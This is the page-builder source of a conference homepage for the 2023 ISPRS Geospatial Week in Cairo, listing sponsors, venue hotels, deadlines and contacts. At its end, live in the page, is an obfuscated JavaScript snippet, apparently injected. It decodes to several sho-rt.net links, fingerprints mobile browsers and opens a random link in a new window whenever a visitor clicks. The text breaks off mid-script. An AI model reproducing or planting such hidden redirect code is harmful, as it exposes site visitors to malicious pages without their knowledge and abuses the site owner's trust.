css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\r\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n&nbsp;\r\n<h3></h3>\r\n[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new 